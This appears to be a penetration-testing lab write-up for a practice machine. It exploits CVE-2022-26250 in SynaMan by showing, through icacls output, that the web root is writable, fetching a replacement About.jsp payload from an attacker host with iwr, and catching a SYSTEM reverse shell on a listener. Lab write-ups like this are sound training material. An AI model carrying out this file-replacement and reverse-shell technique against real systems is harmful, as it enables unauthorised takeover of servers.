CVE-2022-26250
The target SynaMan instance has been identified to be vulnerable to CVE-2022-26250. The vulnerability has been manually confirmed.
/Practice/Fish/5-Privilege_Escalation/attachments/{771D4310-85C3-4F6F-9BB2-C909F06C9FC6}.png)
A vulnerability was found in Synametrics Synaman up to 5.1. It has been classified as critical. This affects an unknown part. The manipulation leads to permission. This vulnerability is uniquely identified as CVE-2022-26250.
Exploit
PS C:\SynaMan\htdocs\webapps\ROOT> icacls C:\SynaMan\htdocs\webapps\ROOT
C:\SynaMan\htdocs\webapps\ROOT BUILTIN\Administrators:(I)(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
Successfully processed 1 files; Failed processing 0 files
PS C:\SynaMan\htdocs\webapps\ROOT> icacls C:\SynaMan\
C:\SynaMan\ BUILTIN\Administrators:(I)(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Users:(I)(OI)(CI)(RX)
NT AUTHORITY\Authenticated Users:(I)(M)
NT AUTHORITY\Authenticated Users:(I)(OI)(CI)(IO)(M)
Successfully processed 1 files; Failed processing 0 filesThe entire C:\SynaMan\ is writable by anyone
Exploitation
/Practice/Fish/5-Privilege_Escalation/attachments/{F4ED58FD-AE2A-49D3-80A2-17CA2BDC91FC}.png)
Given that no credential is known at this time, web application access is rather limited.
However, the About section can be accessed without authentication.
PS C:\SynaMan\htdocs\webapps\ROOT> mv .\About.jsp .\About.jsp.bak
PS C:\SynaMan\htdocs\webapps\ROOT> iwr -Uri http://192.168.45.249/About.jsp -OutFile C:\SynaMan\htdocs\webapps\ROOT\About.jspRenaming the original About.jsp file and replacing it with the payload
/Practice/Fish/5-Privilege_Escalation/attachments/{61F81E81-F4FC-4358-9B0F-9D33A8A5026E}.png)
/Practice/Fish/5-Privilege_Escalation/attachments/{882B9C33-6F35-4D6D-AA92-75E18728BD99}.png)
Now just need to click into the About button to invoke the payload
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/fish]
└─$ nnc 4444
listening on [any] 4444 ...
connect to [192.168.45.249] from (UNKNOWN) [192.168.219.168] 50393
Microsoft Windows [Version 10.0.19042.1288]
(c) Microsoft Corporation. All rights reserved.
C:\SynaMan> whoami
whoami
nt authority\system
C:\SynaMan> hostname
hostname
Fishyyy
C:\SynaMan> ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 192.168.219.168
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.219.254System level compromise